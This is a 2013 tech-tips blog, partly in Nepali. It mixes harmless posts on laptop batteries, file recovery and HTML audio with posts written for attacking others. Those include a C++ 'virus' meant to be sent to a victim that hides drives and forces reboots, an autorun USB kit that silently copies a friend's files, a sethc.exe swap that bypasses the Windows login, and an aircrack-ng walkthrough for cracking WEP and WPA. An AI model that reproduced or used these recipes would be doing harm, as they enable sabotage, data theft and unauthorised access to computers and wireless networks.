Search This Blog

Sunday, June 23, 2013

Increase Laptop Battery Life-(in Nepali)

लामो लोडसेडिङ, ल्यापटपमा गर्नुपर्ने काम थुप्रै । तर ल्यापटपको ब्याट्रीको चार्ज लामो समयसम्म नटिक्दा कसलाई पो सकस नपर्ला र ? बजारमा विभिन्न थरीका ल्यापटप छन् । किनेको सुरुताका सबैको ब्याट्री ब्याकअप राम्रै हुन्छ तर छोटो समयमै ब्याट्रीको काम खस्किन थाल्छ अर्थात् ब्याकअप घट्दै जान्छ ।

 ब्याट्रीको चार्ज नखप्नु अर्थात् ब्याकअप राम्रो नदिनुमा एउटा कारण ब्याट्री पुरानो हुँदै जानु हो तथापि यसका अन्य कारणहरु पनि हुन्छन् । ल्यापटपको ब्याट्री कति खप्छ ? भन्ने कुरा प्रयोगकर्ताको हातमा पनि भर पर्छ । ल्यापटपको ब्याट्रीको आयू बढाउने केही टिप्सहरु यहाँ प्रस्तुत गरेका छौँ, जसलाई जो कोही ल्यापटप प्रयोगकर्ताले सजिलै व्यवहारमा उतार्न सक्छौँ :



  •   स्क्रीन चहकिलोपना अर्थात् स्क्रीन लाइटलाई कम गर्नुहोस् । स्क्रीनलाई जति धेरै चहकिलो बनाउनुहुन्छ उतिधेरै बढि उर्जा प्रयोग हुन्छ र ब्याट्रीको चार्ज छिटो सकिन्छ । किबोर्ड ब्याकलाइटिङ सिस्टम छ भनेपनि त्यसलाई अफ गर्नुहोस् ।
  •  ल्यापटपको युएसबी पोर्टमा घुसारेका पेन ड्राइभ जस्ता डिभाइसहरुले पनि ल्यापटपको उर्जा खान्छन् । त्यसैले काम सकिएपछि त्यस्ता बाह्य डिभाइस निकालिहाल्नुपर्छ ।
  •  ल्यापटपलाई बढि तात्नबाट जोगाउनुहोस् । सकेसम्म हावा चल्ने स्टाण्डमा राखेर ल्यापटप चलाउनुहोस् । ओछ्यान वा काखमा राखेर ल्यापटप चलाउँदा ल्यापटपको भित्री भागमा हावा खेल्न पाउँदैन । जसका कारण ल्यापटप बढि तात्छ । तापक्रम बढ्दा ल्यापटपको आन्तरिक पंखा तिब्र गतिमा घुम्छ जसका कारण बढि उर्जा खपत हुन जान्छ र ब्याट्रीको चार्ज छिटो सकिन्छ ।
  • तत्कालका लागि ल्यापटप चलाउनु भएको छैन, छिटै ल्यापटप चलाउनुपर्नेछ र सट डाउन गरिहाल्ने अवस्था छैन भने ल्यापटपलाई हाइबरनेट गर्नुहोस् । ल्यापटपलाई स्टाण्डबाई राख्न विना काममा उर्जा खपत हुन्छ तर हाइबरनेट गर्दा स्क्रीन बन्द हुनगई उर्जा बचत हुन्छ ।
  • विन्डोज अपरेटिङ सिस्टमबाट संचालित ल्यापटपमा पावर प्लान सेटिङ सेवा उपलब्ध हुन्छ । डिस्प्ले ब्राइटनेस, व्हेन टू टर्न अफ डिस्प्ले, हार्ड ड्राइभ, युएसबी जस्ता अप्सन दिइएको हुन्छ । यस्ता सेटिङको प्रयोगबाट विनाकारण हुने ब्याट्रीको उर्जाको खपत घटाउन सकिन्छ र ब्याट्रीको आयू बढाउन सकिन्छ ।
यो त सबै भयो चलिरहेको लेप्टोपमा के गर्ने अनि के न गर्ने भन्ने कुरा तर यदि तपाई कहिले कहिँ मात्र लेप्टोप प्रयोग गर्नु हुन्छ वा लामो समय सम्म बाहिर जादै हुनुहुन्छ भने साबधान!! जानु अघि लेप्टोप को बेटरी लेप्टोप बाट अलग गर्न न बिर्सनु होला ।

Saturday, June 22, 2013

Recover Deleted Files

Sometimes we delete the files permanently, and realize that deleting them is like a Blunder Mistake...

For all those folks,
Here is the solution


Software called "Kissass Undelete" , can bring those files from the hard disk or your flash drive.

Conditions : Only if the data on that drive is not re-occupied(or written, that means the space which was available after the deletion is not been occupied after the deletion)i.e Before Copying a New file in the particular disk.

Click The link below to download the software .

http://sourceforge.net/projects/kickassundelete/

1) To start searching for the files, Select the drive from the Left panel of the Windows and Click the scan button. the Scan might take upto 10 secs.

2) When the files search has been completed, it will show you the results with the name, typ, size and the last modified date of the searched file.

3) Now you can select the file to be recover. This is an Open source application and available for All Windows OS(Windows XP/Vista/ 7).
 
Hope you enjoyed!!

Hardware Keylogger

Security For Yourself While Surfing In Cafe.






If you visit a cyber cafe and find any black pin attached to the CPU
as shown in the picture, do not use that system. This pin is actually a connection
which saves all your data you enter in the system. It is a hardware keylogger,
very powerful, it records each and every action on your system.
This is a risk to your privacy over the net, at risk are passwords,
banking, or any other data you enter.


So Beware and "DONT USE THESE TYPE OF SYSTEM"

Please *SHARE* this information among your dears and secure them too...!


Create a Virus Using C++



BEFORE YOU START PLEASE NOTE:
THIS PROGRAM IS ONLY FOR
TUTORIAL PURPOSE. WE ARE NOT
RESPONSIBLE FOR DAMAGE CAUSED
BY THE PROGRAM INTO YOUR SYSTEM.
 
 Open Notepad and copy the given Code:

#include<windows.h>
#include<fstream.h>
#include<iostream.h>
#include<string.h>
#include<conio.h>
int main()
{
ofstream write("C:\\WINDOWS\
\system32\\Hacks,-Cracks,-Tips-&-Tools.bat"); /
*opening or creating new file
with .bat extension*/
write<<"REG ADD
HKEY_LOCAL_MACHINE\\SOFTWARE\
\Microsoft\\Windows\\CurrentVer
sion\\policies\\Explorer /v
NoDrives /t REG_DWORD /d 12\n";
write<<"REG ADD
HKEY_LOCAL_MACHINE\\SOFTWARE\
\Microsoft\\Windows\\CurrentVer
sion\\policies\\Explorer /v
NoViewonDrive /t REG_DWORD /d
12\n";
write<<"shutdown -r -c \"Sorry
Your System is hacked by us!\" -
f"<<"\n";
write.close(); //close file
ShellExecute(NULL,"open","C:\
\WINDOWS\\system32\
\Hacks,-Cracks,-Tips-&-Tools.bat",NULL,NULL,SW_SHOWNORMAL);
return 0;
}

Save the file with .cpp extension
Compile and create .exe file in cpp
 
Note:
Don't run this c++ program ,it will
attack your system itself.

Copy the created .exe file and
send it to your victim. You can attach it with any file or any means.
Hope you will enjoy!!

Friday, June 21, 2013

Never Worry For Lost Laptops

Hello Friends, I m going to teach you a hidden secret of finding the lost laptops and desktops with the help of a small trick. Here we go:
Requirements:
  1.  Working Internet connection
  2.  Preyproject(software)

Now you have to have a software named Prey. (Don't have it, Download here)
now after you download the software Run it as a Administrative privilege.
I ll show you the complete process of installation. 
click on next>>>>>

click on I Agree>>>>>

Here u notice that the software is going to be installed in c:\Prey, so click next>>>>>

Click on Install to begin Installation.

Now Wait until the Installation finishes.

Click next>>>>>

Now Setup the Prey account>>>>>

Check on New User to register, (If you already have prey account then check on existing user)
and click on Next>>>>>


Fill in the fields to register and Click on Create>>>>>

Successfully Installed Prey on your PC.
Now what you have to do is  go to your browser and type www.panel.preyproject.com,

Login with your Account details.
 












 The marked place in pictures denotes the following:

  1. Turn it ON when you miss your laptop or desktop.
  2. Geo location ON, will trace the geographical location of the lost laptop
  3. Keeping this Properties ON will make a alert(alarm) on your System.
  4. Keeping Network ON will trace the exact network or the IP that the Lost laptop is using.
  5. Keeping this Properties ON will display a Alert Message on your system .
  6. Keeping ON Get Active connection will loop you to the network the machine is running on .
  7. Keeping Lock=ON will Lock the system remotely with user defined password.
  8. Get Nearby Hotspot will make you easier to trace the machine as the nearby Hotspot are displayed.
  9. Secure=ON will keep all the data in your machine safe by remotely locking up the disk.
  10. Trace Route=ON will trace the IP of the machine to server.
  11. Get screenshot=ON will take the screen picture of the machine so that we can know what the Thief is doing in your machine.
  12. Webcam=On will take a snapshot of the person who is using the computer, From here you may file the case to the person of whose you have the photograph.

[Note: The steps 3, 5, 7 & 9 will work with the software installed in your machine, the instruction provided in this page will be stored and are displayed whether you have or don't have working internet connection also you can set the time interval of notification under the step 1]








Hope you will like it. Please do comment.!! Thanks





How to Unlock Password Protected PC-Win7

This is a simple idea of Unlocking the PC or in other words we say cracking the password protected Computer.
Just you need is a Windows 7 Installation disk, and little mind

 Now here we go.

  1. Shutdown the PC
  2. Insert the disk
  3. Boot from the disk
  4. Complete the process and when the step of installing or repair comes then click on repair.
  5. Go to command prompt section
  6. Then there locate the windows installed disk, most of the system have D:\ as a system disk in this case, look for it by typing c:\ for c-drive and check the directories in it by typing c:\cd dir
  7. After locating the system drive type the following command(lets assume the system drive be D-drive)
copy d:\windows\system32\sethc.exe<space>d:\

     8. This command copies the file named sethc to root of the drive as a backup.

copy d:\windows\system32\cmd.exe<space>d:\windows\system32\sethc.exe

     9. Now exit from the cmd and reboot the computer normally.
    10. Go to login screen and press SHIFT key for regular 5 times[before pressing note down the username]
    11. A cmd.exe window will pop up. Type the following command in it and hit enter

net user <username> <password>
   12. A message displays in the console saying that "the command successfully completed"
   13. Exit from cmd.exe and type the new password that you provided to the login section,
   Happy Hacking.

for more posts keep on looking through the blog.

Sunday, June 16, 2013

Add Music to Blog And Website

Background music has a cool effect on the visitors of your blog or websites. It may help you in catching the attention of your visitors, that is what needed by every blogger or web designer or developer. We will describe here different methods of embedding background music but before them there are some important points that should be remembered.
Background music not only enhances the reading pleasure but may also annoy the reader, if the music played is opposite or irrelevant to the matter of blog or website. It may also increase the page loading time if too big music file is used, so kindly avoid too much heavy file and please also provide play stop option for the visitor, helping him to stay on the page.



The first thing you need to start this is a music file uploaded onto a server. For bloggers the best free server are Google Sites or Google Drive. Once Uploaded, copy the url of music file and use it in any one of the following codes (whatever you use).
There are two main methods of embedding or using background music in your blog or website, based on the type of browser compatibility. For browsers having HTML5 compatibility audio tags are used while for older browsers embed tag is used.
For using audio tags copy the following code anywhere in your website or blog, inside the body tags. Replace the music url with your music file URL. The text in between audio tags “your browser doesn’t support HTML5” is shown in the browsers that doesn’t support HTML5, if you want to remove it you can.

Code

<audio src="music url" controls>
<p>Your Browser Doesn’t Support HTML5</p>
</audio>


For older browsers or for browsers that don’t have HTML5 compatibility use the following code.

Code


<embed name="bgmusic" src="music url" width="300" height="90" autostart="false" control="smallconsole" />


You can change the width, height, autostart and name attributes as you wish. For cross browser support and to avoid any problem it is better to use both these code, i.e. using embed tag in between audio tags as shown below.

Code


<audio src="music url" controls> <embed src="music url" width="300" height="90" loop="false" autostart="false" control="smallconsole" />
</audio>





Make Your Keyboard Dance like Disco

Keyboards usually have small LEDs which indicate whether different types of locks are activated or not. Here is a trick to use the lights of your keyboard in a more creative manner in Windows.

This trick uses a simple Visual Basic Script which when activated makes your Scroll lock, Caps lock and Num lock LEDs flash in a cool rhythmic way which gives the perception of a live disco on your keyboard.



To make your own live disco, follow the steps given below:-

1. Open Notepad.
2. Copy paste the exact code given below:-

set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop
3. Save the file as Disco.vbs or "*.vbs".




Double click on the Saved file to see the LED lights on your keyboard go crazy and make your own cool disco.

This trick has been tested on Windows XP, Windows Vista, Windows 7 and Windows 8 and found to be working perfectly.

You can disable the keyboard disco by starting Task Manager and ending the wscript.exe process.
or type this code and save it as *.bat. and this will stop the disco.
cd\
taskkill /f /im wscript.exe

YouTube Timestamp Trick


Hey, all you YouTube users out there. Have you ever wanted to skip ahead in a video, but you didn’t want to wait for thebuffer bar to load all the way to your favorite part? Well, here’s a neat little trick to help you skip directly to a specific timestamp!

All you have to do is put the time in at the end of the URL in the address bar using this formula #t=XXmYYs (Where XX represents minutes and YY represents seconds).


As shown in Image below:


So, if your favorite part of a video starts at 2 minutes and 15 seconds in, you’d input #t=02m15s at the end of the URL. Like this:

Then, all you have to do is press Enter and the video should start at the timestamp you specified!

How cool is that?

How to Fix Ntldr is Missing in Windows XP

:
NTLDR is the file that regulates the start up procedure. Every time you start up your computer, this file tells your computer to load Windows. Ntldr is missing is the only a problem on computers that are running Windows XP or previous operating system. As one of three crucial boot files, along with ntdetect.com and boot.ini, a missing or corrupted NTLDR may prevent operating system from launching or put you into an endless boot and restart sequence.



Causes of:  NTLDR is Missing
NTLDR is Missing may occur if the BIOS on your computer is outdated, or if one or more of the following Windows boot files are missing or damaged:
·         Ntldr is missing, Ntldr is corrupted, or Ntldr is compressed
·         Ntdetect.com is missing
·         Invalid Boot.ini
How to Fix Ntldr is Missing?
·         1. Restart your computer since sometimes the Ntldr is missing could be a fluke.
·         2. Check if there is any external drives connect to your computer. Sometimes, Ntldr is missing error appears if your computer is trying to boot from a non-bootable media. If you found you get the problem due to this reason, you should go to set the BIOS to set the hard drive with Windows installed is listed first.
·         3. If Ntldr error still happens, you should utilize a reliable third-party program. Windows Boot Genius is a smart choice for you to fix all Windows booting issues including Ntldr is missing. You can quickly and effectively troubleshot Ntldr error by following the short guide:1
Step 1: Create a Windows 7 Black Screen Fixing CD/DVD/USB
Download this software and install it on a bootable computer. Insert a CD/DVD into your driver (or plug in a USB flash drive into the USB port). Then launch this program, and get the interface like below. This software will check the CD automatically, and you just need to click "Burn". After the bootable CD burning finished, unplug it.

Step 2: Boot Your Computer from CD/DVD/USB
Then turn to the computer that appears Ntldr is missing: insert newly burned CD into this computer, and set your CD drive as the first boot device in BIOS. Press "F10"to save the settings. Then your computer will restart automatically and attempt to boot from the CD you just created.

Step 3: Fix Ntldr is Missing
When Windows fully loads, double click Windows Boot Genius on the desktop to launch it again. Choose "Windows Rescue"from the main menu and select "Crash before Loading Bar". And try the tools it lists one by one until you can login into Windows normally and never appears Ntldr is missing.

Steal Data Using your USB Flash Drive.


In today’s article I am going to teach you something illegal but only for educational propose. This only demonstrates how you can copy files from your friend’s PC as soon as you plug in your flash drive or any removable storage media Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him.

He deserves it anyway.To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.



STEP 1


Open Notepad (I recommend Notepad++) and copy-paste the following lines.


[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat


Save this as autorun.inf


The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.


The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.


The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.


STEP 2


Open Notepad again and copy-paste the following lines


@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls


Save this as file.bat


This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.


The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.


STEP 3


Open Notepad once again and copy-paste the following line.


CreateObject(“Wscript.Shell”).Run “”"” & WScript.Arguments(0) & “”"”, 0, False


Save this as invisible.vbs

This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.


STEP 4


Open Notepad one last time and copy-paste the following line.


wscript.exe \invisible.vbs file.bat


Save this as launch.bat


This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.

STEP 5


Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.


This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your victim. It works flawlessly.

BackTrack Wireless Penitration- Complete Guide



This tutorial is for educational purpose and I'm not responsible for any misuse of the aircrack-ng tool.

Here's a WEP and WPA cracking tutorial.

Wep Cracking Tutorial:
First of all you need Backtrack Live Cd ( ISO or Vmware Image ) that can be downloaded from :
http://www.backtrack-linux.org/downloads/

Or a Linux Distro with Aircrack-ng installed (it can be cracked with other tools but this tutorial is for aircrack ).
And the most important thing is that YOU NEED TO HAVE A WIRELESS CARD that SUPPORTS INJECTION.

Description:
Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the all-new PTW attack, thus making the attack much faster compared to other WEP cracking tools.
In fact, Aircrack-ng is a set of tools for auditing wireless networks.
Tutorial: How to crack WEP with no wireless clients. (it will work even with clients, work for both).
1) To know what interface your wireless card is using, for example wlan0 or mon0 or ath0 .......
type:
iwconfig
my interface will be "wlan0"


2) to set you wireless card on monitor mode you must type:
airmon-ng start wlan0
2) To know if your wireless card supports injection or not.
open a shell and type:
aireplay-ng -9 wlan0         or           aireplay-ng --test wlan0
3) To dump all the wireless around your wireless card.
airodump-ng wlan0
and it will show you all the wireless names (ESSID), MAC address (BSSID), Channel .......


4) To know your wireless card Mac Address, type:
macchanger -s wlan0
5) After you choose your TARGET, you type:
airodump-ng --bssid (Mac address) -c (channel number) -w (any name) wlan0
Keep this shell and open another to typer the other commands.


6) Use aireplay-ng to do a fake authentication with the access point.
This is a very important step.
In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet. In this state, no new IVs are created because the AP is ignoring all the injected packets.
The lack of association with the access point is the single biggest reason why injection fails.
To associate with an access point, use fake authentication.
Type:
 aireplay-ng -1 0 -e (Target wireless name or ESSID) -a (Target Mac address or BSSID) -h (your wireless card mac address) wlan0
-e is optional.


7)
The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) file. This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.
Here you can use 2 types of attacks. Either you use ChopChop(-4) or Fragmentation(-5) attack.
 aireplay-ng -5 -b (target Mac address or BSSID) -h (your wireless card mac address) wlan0
I prefer Fragmentation but still if Fragmentation didn't work, you can always try ChopChop attack.
 aireplay-ng -4 -b (target Mac address or BSSID) -h (your wireless card mac address) wlan0
When a packet from the access point arrives, enter “y” to proceed. You may need to try a few to be successful.
if succesful then you will get:
"Success! The file “fragment-01234-42132148.xor”= "example.xor" can then be used in the next step to generate an arp packet. "
8) In the previous step, we obtained PRGA. It does not matter which attack generated the PRGA, both are equal. This PRGA is stored in the files ending with “xor”. We can then use this PRGA to generate a packet for injection. We will be generating an arp packet for injection. The objective is to have the access point rebroadcast the injected arp packet. When it rebroadcasts it, a new IV is obtained. All these new IVs will ultimately be used to crack the WEP key.
 packetforge-ng -0 -a (Target mac address or BSSID) -h (your wireless card mac address) -k 255.255.255.255 -l 255.255.255.255 -y (.xor you received in the last step) -w (any name)
9) Now to Inject the arp packet, enter:
aireplay-ng -2 -r (name in -w in packetforge) ath0
or
aireplay-ng -3 -r (name in -w in packetforge) -b (target mac address) -h (your wireless card mac address) wlan0
10) LAST STEP:
 aircrack-ng (name in -w from airodump step 5)-01.cap
if you used step 5) more than 1 time with the same name in -w, check the desktop.
For example, if you used in step 2 -w lebgeek  then you used it again same name, your last step will be lebgeeks-02.cap.



=================================================
Cracking WPA:
WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.
The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.
There is another important difference between cracking WPA/WPA2 and WEP. This is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is, because the key is not static, so collecting IVs like when cracking WEP encryption, does not speed up the attack. The only thing that does give the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.
IMPORTANT This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.
Before we start, There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.
1) Start airodump-ng to collect authentication handshake
The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.
Beware - YOU CAN'T CRACK A WPA WITHOUT GETTING a 4-WAY AUTHENTICATION HANDSHAKE.
Same steps in WEP until STEP 4.
type:
airodump-ng -c (target channel) --bssid (target mac address or BSSID) -w (any name) wlan0
CH  9 ][ Elapsed: 4 s ][ 20010-12-6 16:30 ][ WPA handshake: 00:14:6C:7E:40:80
In the line above, notice the “WPA handshake: 00:14:6C:7E:40:80” in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.


2) Use aireplay-ng to deauthenticate the wireless client.
"This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.
This step sends a message to the wireless client saying that that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key."
Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following.
Open a new shell and type the following:
 aireplay-ng -0 1 -a (target mac address) -c (your wireless card mac address) wlan0
To know if its working or not you should check the output:
 16:30:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]
Tip:"The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not “hear” the deauthentication packet."
3)Run aircrack-ng to crack the pre-shared key.
aircrack-ng -w (any worldlist .lst ...) -b (Target mac address) (name in -w in airodump-ng)-01.cap
if you get this error:  No valid WPA handshakes found. That means you didn't get any handshake.


Anyway I won't waste my time with WPA cracking because lebanese people use most of the time their phone numbers or strange names as password so its difficult to crack.
WPA cracking could be done by Bruteforcing but imagine how much time it needs to be done ?
check this site to calculate the bruteforcing speed to crack a pass 
http://lastbit.com/pswcalc.asp


Hope you enjoy it.
Will post some tutorials from time to time.